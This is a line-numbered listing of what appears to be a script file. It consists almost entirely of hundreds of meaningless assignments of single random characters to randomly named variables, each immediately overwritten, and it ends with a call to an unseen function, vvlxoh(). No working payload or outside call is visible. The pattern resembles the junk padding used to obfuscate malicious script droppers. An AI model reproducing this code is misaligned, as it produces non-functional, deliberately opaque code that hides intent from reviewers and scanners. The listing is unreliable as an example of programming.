707 | vwzgdpo = "S"; | |
708 | vwzgdpo = "w"; | |
709 | vwzgdpo = "Y"; | |
710 | vwzgdpo = "l"; | |
711 | vwzgdpo = "x"; | |
712 | vwzgdpo = "T"; | |
713 | vwzgdpo = "Z"; | |
714 | vwzgdpo = "d"; | |
715 | vwzgdpo = "U"; | |
716 | vwzgdpo = "k"; | |
717 | vwzgdpo = "c"; | |
718 | vwzgdpo = "H"; | |
719 | vwzgdpo = "j"; | |
720 | vwzgdpo = "S"; | |
721 | vwzgdpo = "o"; | |
722 | vwzgdpo = "s"; | |
723 | vwzgdpo = "p"; | |
724 | vwzgdpo = "D"; | |
725 | vwzgdpo = "s"; | |
726 | vwzgdpo = "C"; | |
727 | vwzgdpo = "a"; | |
728 | vwzgdpo = "H"; | |
729 | vwzgdpo = "W"; | |
730 | vwzgdpo = "o"; | |
731 | vwzgdpo = "Q"; | |
732 | vwzgdpo = "q"; | |
733 | vwzgdpo = "C"; | |
734 | vwzgdpo = "z"; | |
735 | vwzgdpo = "i"; | |
736 | vwzgdpo = "j"; | |
737 | vwzgdpo = "g"; | |
738 | vwzgdpo = "C"; | |
739 | vwzgdpo = "P"; | |
740 | vwzgdpo = "r"; | |
741 | vwzgdpo = "z"; | |
742 | vwzgdpo = "J"; | |
743 | vwzgdpo = "d"; | |
744 | mdwfx = "w"; | |
745 | mdwfx = "n"; | |
746 | mdwfx = "t"; | |
747 | mdwfx = "d"; | |
748 | mdwfx = "i"; | |
749 | mdwfx = "K"; | |
750 | mdwfx = "n"; | |
751 | mdwfx = "y"; | |
752 | mdwfx = "D"; | |
753 | mdwfx = "W"; | |
754 | mdwfx = "B"; | |
755 | mdwfx = "V"; | |
756 | mdwfx = "i"; | |
757 | mdwfx = "Q"; | |
758 | mdwfx = "I"; | |
759 | mdwfx = "T"; | |
760 | mdwfx = "e"; | |
761 | mdwfx = "i"; | |
762 | mdwfx = "k"; | |
763 | mdwfx = "r"; | |
764 | mdwfx = "Y"; | |
765 | mdwfx = "H"; | |
766 | mdwfx = "H"; | |
767 | mdwfx = "s"; | |
768 | mdwfx = "B"; | |
769 | mdwfx = "B"; | |
770 | mdwfx = "c"; | |
771 | mdwfx = "W"; | |
772 | mdwfx = "S"; | |
773 | mdwfx = "z"; | |
774 | mdwfx = "Y"; | |
775 | mdwfx = "H"; | |
776 | mdwfx = "O"; | |
777 | mdwfx = "E"; | |
778 | mdwfx = "P"; | |
779 | mdwfx = "R"; | |
780 | mdwfx = "N"; | |
781 | mdwfx = "j"; | |
782 | mdwfx = "Y"; | |
783 | qhixyo = "J"; | |
784 | qhixyo = "W"; | |
785 | qhixyo = "Y"; | |
786 | qhixyo = "T"; | |
787 | qhixyo = "v"; | |
788 | qhixyo = "G"; | |
789 | qhixyo = "W"; | |
790 | qhixyo = "j"; | |
791 | qhixyo = "n"; | |
792 | qhixyo = "H"; | |
793 | qhixyo = "k"; | |
794 | qhixyo = "M"; | |
795 | qhixyo = "r"; | |
796 | qhixyo = "g"; | |
797 | qhixyo = "R"; | |
798 | qhixyo = "B"; | |
799 | qhixyo = "d"; | |
800 | qhixyo = "v"; | |
801 | qhixyo = "K"; | |
802 | qhixyo = "W"; | |
803 | qhixyo = "s"; | |
804 | qhixyo = "w"; | |
805 | bkwmtd = "i"; | |
806 | bkwmtd = "l"; | |
807 | bkwmtd = "V"; | |
808 | bkwmtd = "y"; | |
809 | bkwmtd = "l"; | |
810 | bkwmtd = "p"; | |
811 | bkwmtd = "r"; | |
812 | bkwmtd = "M"; | |
813 | bkwmtd = "J"; | |
814 | bkwmtd = "T"; | |
815 | bkwmtd = "N"; | |
816 | bkwmtd = "C"; | |
817 | bkwmtd = "X"; | |
818 | bkwmtd = "U"; | |
819 | bkwmtd = "K"; | |
820 | bkwmtd = "p"; | |
821 | bkwmtd = "E"; | |
822 | bkwmtd = "f"; | |
823 | bkwmtd = "e"; | |
824 | bkwmtd = "D"; | |
825 | bkwmtd = "k"; | |
826 | ncqef = "Z"; | |
827 | ncqef = "I"; | |
828 | ncqef = "g"; | |
829 | ncqef = "T"; | |
830 | ncqef = "N"; | |
831 | ncqef = "Z"; | |
832 | ncqef = "U"; | |
833 | ncqef = "I"; | |
834 | ncqef = "K"; | |
835 | ncqef = "C"; | |
836 | ncqef = "r"; | |
837 | ncqef = "Y"; | |
838 | ncqef = "V"; | |
839 | ncqef = "u"; | |
840 | ncqef = "B"; | |
841 | ncqef = "A"; | |
842 | ncqef = "P"; | |
843 | ncqef = "P"; | |
844 | ncqef = "v"; | |
845 | ncqef = "l"; | |
846 | ncqef = "0"; | |
847 | usqlnj = "n"; | |
848 | usqlnj = "e"; | |
849 | usqlnj = "l"; | |
850 | usqlnj = "F"; | |
851 | usqlnj = "r"; | |
852 | usqlnj = "n"; | |
853 | usqlnj = "S"; | |
854 | usqlnj = "B"; | |
855 | usqlnj = "P"; | |
856 | usqlnj = "b"; | |
857 | usqlnj = "Z"; | |
858 | usqlnj = "w"; | |
859 | usqlnj = "X"; | |
860 | usqlnj = "J"; | |
861 | usqlnj = "Z"; | |
862 | usqlnj = "x"; | |
863 | usqlnj = "N"; | |
864 | usqlnj = "r"; | |
865 | usqlnj = "I"; | |
866 | usqlnj = "Q"; | |
867 | usqlnj = "j"; | |
868 | usqlnj = "m"; | |
869 | usqlnj = "D"; | |
870 | usqlnj = "X"; | |
871 | usqlnj = "U"; | |
872 | usqlnj = "M"; | |
873 | usqlnj = "A"; | |
874 | usqlnj = "x"; | |
875 | usqlnj = "I"; | |
876 | usqlnj = "H"; | |
877 | kngankzc = "Y"; | |
878 | kngankzc = "s"; | |
879 | kngankzc = "q"; | |
880 | yvjvm = "v"; | |
881 | yvjvm = "P"; | |
882 | yvjvm = "t"; | |
883 | yvjvm = "E"; | |
884 | yvjvm = "H"; | |
885 | yvjvm = "U"; | |
886 | yvjvm = "u"; | |
887 | yvjvm = "r"; | |
888 | yvjvm = "s"; | |
889 | yvjvm = "a"; | |
890 | yvjvm = "D"; | |
891 | yvjvm = "r"; | |
892 | yvjvm = "K"; | |
893 | yvjvm = "N"; | |
894 | yvjvm = "b"; | |
895 | yvjvm = "m"; | |
896 | yvjvm = "W"; | |
897 | yvjvm = "T"; | |
898 | yvjvm = "s"; | |
899 | yvjvm = "m"; | |
900 | yvjvm = "N"; | |
901 | yvjvm = "K"; | |
902 | yvjvm = "W"; | |
903 | yvjvm = "y"; | |
904 | yvjvm = "v"; | |
905 | yvjvm = "g"; | |
906 | yvjvm = "A"; | |
907 | yvjvm = "Q"; | |
908 | yvjvm = "_"; | |
909 | hqgibecqk = "g"; | |
910 | hqgibecqk = "O"; | |
911 | hqgibecqk = "y"; | |
912 | hqgibecqk = "q"; | |
913 | hqgibecqk = "Y"; | |
914 | hqgibecqk = "a"; | |
915 | hqgibecqk = "G"; | |
916 | hqgibecqk = "u"; | |
917 | hqgibecqk = "e"; | |
918 | hqgibecqk = "u"; | |
919 | hqgibecqk = "m"; | |
920 | hqgibecqk = "b"; | |
921 | hqgibecqk = "x"; | |
922 | hqgibecqk = "f"; | |
923 | hqgibecqk = "u"; | |
924 | hqgibecqk = "L"; | |
925 | hqgibecqk = "e"; | |
926 | hqgibecqk = "q"; | |
927 | hqgibecqk = "x"; | |
928 | hqgibecqk = "G"; | |
929 | hqgibecqk = "Z"; | |
930 | hqgibecqk = "D"; | |
931 | hqgibecqk = "G"; | |
932 | hqgibecqk = "y"; | |
933 | hqgibecqk = "A"; | |
934 | hqgibecqk = "s"; | |
935 | hqgibecqk = "t"; | |
936 | hqgibecqk = "F"; | |
937 | hqgibecqk = "Q"; | |
938 | hqgibecqk = "O"; | |
939 | hqgibecqk = "\\"; | |
940 | euctv = "r"; | |
941 | euctv = "o"; | |
942 | euctv = "Z"; | |
943 | euctv = "o"; | |
944 | euctv = "W"; | |
945 | euctv = "C"; | |
946 | euctv = "S"; | |
947 | euctv = "T"; | |
948 | euctv = "Z"; | |
949 | euctv = "Q"; | |
950 | euctv = "s"; | |
951 | euctv = "D"; | |
952 | euctv = "E"; | |
953 | euctv = "a"; | |
954 | euctv = "P"; | |
955 | euctv = "R"; | |
956 | euctv = "H"; | |
957 | euctv = "N"; | |
958 | euctv = "Q"; | |
959 | euctv = "E"; | |
960 | euctv = "Q"; | |
961 | euctv = "J"; | |
962 | euctv = "O"; | |
963 | euctv = "P"; | |
964 | euctv = "V"; | |
965 | euctv = "x"; | |
966 | euctv = "f"; | |
967 | euctv = "z"; | |
968 | euctv = "q"; | |
969 | euctv = "o"; | |
970 | euctv = "Z"; | |
971 | euctv = "y"; | |
972 | euctv = "U"; | |
973 | euctv = "g"; | |
974 | euctv = "G"; | |
975 | euctv = "W"; | |
976 | euctv = "N"; | |
977 | euctv = "w"; | |
978 | euctv = "i"; | |
979 | euctv = "B"; | |
980 | euctv = "I"; | |
981 | euctv = "T"; | |
982 | euctv = "M"; | |
983 | euctv = "U"; | |
984 | euctv = "U"; | |
985 | hlpsay = "n"; | |
986 | hlpsay = "%"; | |
987 | ddtzyn = "M"; | |
988 | ddtzyn = "4"; | |
989 | kfzrqpj = "R"; | |
990 | kfzrqpj = "Q"; | |
991 | kfzrqpj = "x"; | |
992 | kfzrqpj = "j"; | |
993 | kfzrqpj = "Q"; | |
994 | kfzrqpj = "P"; | |
995 | kfzrqpj = "Z"; | |
996 | kfzrqpj = "u"; | |
997 | kfzrqpj = "x"; | |
998 | kfzrqpj = "P"; | |
999 | kfzrqpj = "o"; | |
1000 | kfzrqpj = "A"; | |
1001 | kfzrqpj = "a"; | |
1002 | kfzrqpj = "I"; | |
1003 | kfzrqpj = "F"; | |
1004 | kfzrqpj = "I"; | |
1005 | kfzrqpj = "O"; | |
1006 | kfzrqpj = "S"; | |
1007 | kfzrqpj = "X"; | |
1008 | kfzrqpj = "n"; | |
1009 | kfzrqpj = "l"; | |
1010 | kfzrqpj = "L"; | |
1011 | kfzrqpj = "Y"; | |
1012 | kfzrqpj = "O"; | |
1013 | kfzrqpj = "c"; | |
1014 | kfzrqpj = "q"; | |
1015 | kfzrqpj = "W"; | |
1016 | kfzrqpj = "A"; | |
1017 | kfzrqpj = "X"; | |
1018 | kfzrqpj = "p"; | |
1019 | kfzrqpj = "H"; | |
1020 | kfzrqpj = "C"; | |
1021 | kfzrqpj = "e"; | |
1022 | kfzrqpj = "N"; | |
1023 | ptybndc = "s"; | |
1024 | ptybndc = "L"; | |
1025 | ptybndc = "x"; | |
1026 | ptybndc = "z"; | |
1027 | ptybndc = "H"; | |
1028 | ptybndc = "x"; | |
1029 | ptybndc = "f"; | |
1030 | ptybndc = "o"; | |
1031 | ptybndc = "d"; | |
1032 | ptybndc = "G"; | |
1033 | ptybndc = "t"; | |
1034 | ptybndc = "K"; | |
1035 | ptybndc = "V"; | |
1036 | ptybndc = "o"; | |
1037 | ptybndc = "A"; | |
1038 | ptybndc = "o"; | |
1039 | ptybndc = "u"; | |
1040 | ptybndc = "t"; | |
1041 | ptybndc = "i"; | |
1042 | ptybndc = "B"; | |
1043 | ptybndc = "F"; | |
1044 | ptybndc = "c"; | |
1045 | ptybndc = "g"; | |
1046 | ptybndc = "O"; | |
1047 | ptybndc = "E"; | |
1048 | ptybndc = "u"; | |
1049 | ptybndc = "r"; | |
1050 | ptybndc = "o"; | |
1051 | ptybndc = "h"; | |
1052 | ptybndc = "D"; | |
1053 | ptybndc = "h"; | |
1054 | ptybndc = "g"; | |
1055 | ptybndc = "q"; | |
1056 | ptybndc = "X"; | |
1057 | ptybndc = "H"; | |
1058 | ptybndc = "v"; | |
1059 | ptybndc = "s"; | |
1060 | ptybndc = "V"; | |
1061 | ptybndc = "i"; | |
1062 | ptybndc = "z"; | |
1063 | ptybndc = "z"; | |
1064 | ptybndc = "J"; | |
1065 | ptybndc = "m"; | |
1066 | vspifeei = "r"; | |
1067 | vspifeei = "v"; | |
1068 | vspifeei = "n"; | |
1069 | vspifeei = "I"; | |
1070 | vspifeei = "H"; | |
1071 | vspifeei = "a"; | |
1072 | vspifeei = "y"; | |
1073 | vspifeei = "S"; | |
1074 | nlmrwrk = "Y"; | |
1075 | nlmrwrk = "s"; | |
1076 | nlmrwrk = "U"; | |
1077 | nlmrwrk = "P"; | |
1078 | nlmrwrk = "z"; | |
1079 | nlmrwrk = "V"; | |
1080 | nlmrwrk = "c"; | |
1081 | nlmrwrk = "x"; | |
1082 | nlmrwrk = "l"; | |
1083 | rrnuhlvni = "x"; | |
1084 | rrnuhlvni = "R"; | |
1085 | rrnuhlvni = "Y"; | |
1086 | rrnuhlvni = "l"; | |
1087 | rrnuhlvni = "V"; | |
1088 | rrnuhlvni = "Q"; | |
1089 | rrnuhlvni = "u"; | |
1090 | rrnuhlvni = "o"; | |
1091 | rrnuhlvni = "U"; | |
1092 | rrnuhlvni = "G"; | |
1093 | rrnuhlvni = "w"; | |
1094 | rrnuhlvni = "G"; | |
1095 | rrnuhlvni = "Y"; | |
1096 | rrnuhlvni = "e"; | |
1097 | rrnuhlvni = "G"; | |
1098 | rrnuhlvni = "V"; | |
1099 | rrnuhlvni = "Z"; | |
1100 | rrnuhlvni = "k"; | |
1101 | rrnuhlvni = "P"; | |
1102 | rrnuhlvni = "u"; | |
1103 | rrnuhlvni = "Y"; | |
1104 | rrnuhlvni = "v"; | |
1105 | rrnuhlvni = "b"; | |
1106 | rrnuhlvni = "r"; | |
1107 | rrnuhlvni = "c"; | |
1108 | rrnuhlvni = "m"; | |
1109 | rrnuhlvni = "Y"; | |
1110 | rrnuhlvni = "Y"; | |
1111 | rrnuhlvni = "B"; | |
1112 | rrnuhlvni = "R"; | |
1113 | rrnuhlvni = "X"; | |
1114 | rrnuhlvni = "I"; | |
1115 | rrnuhlvni = "N"; | |
1116 | rrnuhlvni = "x"; | |
1117 | rrnuhlvni = "N"; | |
1118 | rrnuhlvni = "T"; | |
1119 | jpugwkkeu = "u"; | |
1120 | jpugwkkeu = "C"; | |
1121 | jpugwkkeu = "l"; | |
1122 | jpugwkkeu = "S"; | |
1123 | jpugwkkeu = "C"; | |
1124 | jpugwkkeu = "B"; | |
1125 | jpugwkkeu = "C"; | |
1126 | jpugwkkeu = "K"; | |
1127 | jpugwkkeu = "E"; | |
1128 | jpugwkkeu = "v"; | |
1129 | jpugwkkeu = "l"; | |
1130 | jpugwkkeu = "m"; | |
1131 | jpugwkkeu = "C"; | |
1132 | jpugwkkeu = "M"; | |
1133 | jpugwkkeu = "p"; | |
1134 | jpugwkkeu = "W"; | |
1135 | jpugwkkeu = "k"; | |
1136 | jpugwkkeu = "c"; | |
1137 | jpugwkkeu = "S"; | |
1138 | jpugwkkeu = "I"; | |
1139 | jpugwkkeu = "Y"; | |
1140 | jpugwkkeu = "v"; | |
1141 | jpugwkkeu = "L"; | |
1142 | jpugwkkeu = "J"; | |
1143 | jpugwkkeu = "J"; | |
1144 | jpugwkkeu = "q"; | |
1145 | jpugwkkeu = "a"; | |
1146 | jpugwkkeu = "O"; | |
1147 | jpugwkkeu = "o"; | |
1148 | jpugwkkeu = "K"; | |
1149 | jpugwkkeu = "O"; | |
1150 | jpugwkkeu = "R"; | |
1151 | jpugwkkeu = "E"; | |
1152 | jpugwkkeu = "I"; | |
1153 | jpugwkkeu = "J"; | |
1154 | jpugwkkeu = "L"; | |
1155 | jpugwkkeu = "c"; | |
1156 | rfvpnpbqs = "M"; | |
1157 | rfvpnpbqs = "O"; | |
1158 | rfvpnpbqs = "W"; | |
1159 | rfvpnpbqs = "f"; | |
1160 | rfvpnpbqs = "s"; | |
1161 | rfvpnpbqs = "H"; | |
1162 | rfvpnpbqs = "V"; | |
1163 | rfvpnpbqs = "C"; | |
1164 | rfvpnpbqs = "."; | |
1165 | fcsaxbx = "n"; | |
1166 | fcsaxbx = "i"; | |
1167 | fcsaxbx = "o"; | |
1168 | fcsaxbx = "k"; | |
1169 | fcsaxbx = "W"; | |
1170 | fcsaxbx = "w"; | |
1171 | fcsaxbx = "h"; | |
1172 | fcsaxbx = "x"; | |
1173 | fcsaxbx = "a"; | |
1174 | fcsaxbx = "k"; | |
1175 | fcsaxbx = "U"; | |
1176 | fcsaxbx = "X"; | |
1177 | fcsaxbx = "R"; | |
1178 | fcsaxbx = "n"; | |
1179 | fcsaxbx = "n"; | |
1180 | fcsaxbx = "V"; | |
1181 | fcsaxbx = "X"; | |
1182 | fcsaxbx = "c"; | |
1183 | fcsaxbx = "B"; | |
1184 | fcsaxbx = "H"; | |
1185 | fcsaxbx = "C"; | |
1186 | fcsaxbx = "w"; | |
1187 | fcsaxbx = "t"; | |
1188 | fcsaxbx = "F"; | |
1189 | fcsaxbx = "d"; | |
1190 | fcsaxbx = "V"; | |
1191 | fcsaxbx = "A"; | |
1192 | fcsaxbx = "i"; | |
1193 | fcsaxbx = "X"; | |
1194 | fcsaxbx = "j"; | |
1195 | fcsaxbx = "U"; | |
1196 | fcsaxbx = "H"; | |
1197 | fcsaxbx = "P"; | |
1198 | fcsaxbx = "W"; | |
1199 | fcsaxbx = "R"; | |
1200 | fcsaxbx = "I"; | |
1201 | fcsaxbx = "t"; | |
1202 | fcsaxbx = "S"; | |
1203 | fcsaxbx = "D"; | |
1204 | fcsaxbx = "m"; | |
1205 | fcsaxbx = "x"; | |
1206 | iucftqylr = "W"; | |
1207 | csnnrs = "O"; | |
1208 | csnnrs = "L"; | |
1209 | csnnrs = "f"; | |
1210 | csnnrs = "t"; | |
1211 | csnnrs = "n"; | |
1212 | csnnrs = "h"; | |
1213 | csnnrs = "I"; | |
1214 | csnnrs = "E"; | |
1215 | csnnrs = "R"; | |
1216 | csnnrs = "M"; | |
1217 | csnnrs = "O"; | |
1218 | csnnrs = "R"; | |
1219 | csnnrs = "K"; | |
1220 | csnnrs = "v"; | |
1221 | csnnrs = "J"; | |
1222 | csnnrs = "P"; | |
1223 | fbqyigpx = "F"; | |
1224 | fbqyigpx = "n"; | |
1225 | fbqyigpx = "M"; | |
1226 | fbqyigpx = "b"; | |
1227 | fbqyigpx = "c"; | |
1228 | fbqyigpx = "n"; | |
1229 | fbqyigpx = "N"; | |
1230 | fbqyigpx = "y"; | |
1231 | fbqyigpx = "T"; | |
1232 | fbqyigpx = "7"; | |
1233 | xrdkrcba = "r"; | |
1234 | xrdkrcba = "C"; | |
1235 | xrdkrcba = "A"; | |
1236 | xrdkrcba = "d"; | |
1237 | xrdkrcba = "U"; | |
1238 | xrdkrcba = "k"; | |
1239 | xrdkrcba = "X"; | |
1240 | xrdkrcba = "N"; | |
1241 | xrdkrcba = "T"; | |
1242 | xrdkrcba = "H"; | |
1243 | xrdkrcba = "W"; | |
1244 | xrdkrcba = "G"; | |
1245 | xrdkrcba = "G"; | |
1246 | xrdkrcba = "R"; | |
1247 | xrdkrcba = "T"; | |
1248 | xrdkrcba = "x"; | |
1249 | xrdkrcba = "q"; | |
1250 | xrdkrcba = "J"; | |
1251 | xrdkrcba = "C"; | |
1252 | xrdkrcba = "Q"; | |
1253 | fyxclgu = "g"; | |
1254 | fyxclgu = "N"; | |
1255 | fyxclgu = "S"; | |
1256 | fyxclgu = "h"; | |
1257 | dtmianlm = "M"; | |
1258 | dtmianlm = "T"; | |
1259 | dtmianlm = "a"; | |
1260 | dtmianlm = "P"; | |
1261 | dtmianlm = "A"; | |
1262 | dtmianlm = "H"; | |
1263 | dtmianlm = "S"; | |
1264 | dtmianlm = "I"; | |
1265 | dtmianlm = "M"; | |
1266 | dtmianlm = "9"; | |
1267 | fusytyl = "k"; | |
1268 | fusytyl = "Q"; | |
1269 | fusytyl = "M"; | |
1270 | fusytyl = "d"; | |
1271 | fusytyl = "A"; | |
1272 | fusytyl = "/"; | |
1273 | mpyvhlc = "j"; | |
1274 | mpyvhlc = "c"; | |
1275 | mpyvhlc = "Q"; | |
1276 | mpyvhlc = "N"; | |
1277 | mpyvhlc = "V"; | |
1278 | mpyvhlc = "M"; | |
1279 | mpyvhlc = "E"; | |
1280 | mpyvhlc = "B"; | |
1281 | mpyvhlc = "C"; | |
1282 | mpyvhlc = "K"; | |
1283 | mpyvhlc = "y"; | |
1284 | mpyvhlc = "e"; | |
1285 | mpyvhlc = "E"; | |
1286 | ipevxlzjm = "L"; | |
1287 | ipevxlzjm = "m"; | |
1288 | ipevxlzjm = "d"; | |
1289 | ipevxlzjm = "X"; | |
1290 | ipevxlzjm = "Z"; | |
1291 | ipevxlzjm = "q"; | |
1292 | ipevxlzjm = "g"; | |
1293 | ipevxlzjm = "c"; | |
1294 | ipevxlzjm = "B"; | |
1295 | ipevxlzjm = "x"; | |
1296 | ipevxlzjm = "x"; | |
1297 | ipevxlzjm = "h"; | |
1298 | ipevxlzjm = "U"; | |
1299 | ipevxlzjm = "F"; | |
1300 | ipevxlzjm = "C"; | |
1301 | ipevxlzjm = "c"; | |
1302 | ipevxlzjm = "o"; | |
1303 | ipevxlzjm = "e"; | |
1304 | ipevxlzjm = "e"; | |
1305 | ipevxlzjm = "w"; | |
1306 | ipevxlzjm = "W"; | |
1307 | ipevxlzjm = "l"; | |
1308 | ipevxlzjm = "o"; | |
1309 | ipevxlzjm = "N"; | |
1310 | ipevxlzjm = "z"; | |
1311 | ipevxlzjm = "v"; | |
1312 | ipevxlzjm = "z"; | |
1313 | ipevxlzjm = "g"; | |
1314 | oacsxvhsl = "r"; | |
1315 | oacsxvhsl = "a"; | |
1316 | oacsxvhsl = "F"; | |
1317 | oacsxvhsl = "O"; | |
1318 | oacsxvhsl = "C"; | |
1319 | oacsxvhsl = "I"; | |
1320 | oacsxvhsl = "p"; | |
1321 | oacsxvhsl = "o"; | |
1322 | oacsxvhsl = "i"; | |
1323 | oacsxvhsl = "s"; | |
1324 | oacsxvhsl = "P"; | |
1325 | oacsxvhsl = "J"; | |
1326 | oacsxvhsl = "m"; | |
1327 | oacsxvhsl = "c"; | |
1328 | oacsxvhsl = "D"; | |
1329 | oacsxvhsl = "i"; | |
1330 | oacsxvhsl = "b"; | |
1331 | oacsxvhsl = "T"; | |
1332 | oacsxvhsl = "i"; | |
1333 | oacsxvhsl = "P"; | |
1334 | oacsxvhsl = "W"; | |
1335 | oacsxvhsl = "X"; | |
1336 | oacsxvhsl = "V"; | |
1337 | oacsxvhsl = "z"; | |
1338 | oacsxvhsl = "H"; | |
1339 | oacsxvhsl = "L"; | |
1340 | oacsxvhsl = "G"; | |
1341 | oacsxvhsl = "h"; | |
1342 | oacsxvhsl = "C"; | |
1343 | oacsxvhsl = "A"; | |
1344 | oacsxvhsl = "P"; | |
1345 | oacsxvhsl = "b"; | |
1346 | oacsxvhsl = "O"; | |
1347 | oacsxvhsl = "b"; | |
1348 | oacsxvhsl = "i"; | |
1349 | oacsxvhsl = "L"; | |
1350 | oacsxvhsl = "x"; | |
1351 | oacsxvhsl = "p"; | |
1352 | oacsxvhsl = "j"; | |
1353 | oacsxvhsl = "e"; | |
1354 | oacsxvhsl = "H"; | |
1355 | oacsxvhsl = "e"; | |
1356 | oacsxvhsl = "K"; | |
1357 | oacsxvhsl = "t"; | |
1358 | vvlxoh ( ); |
|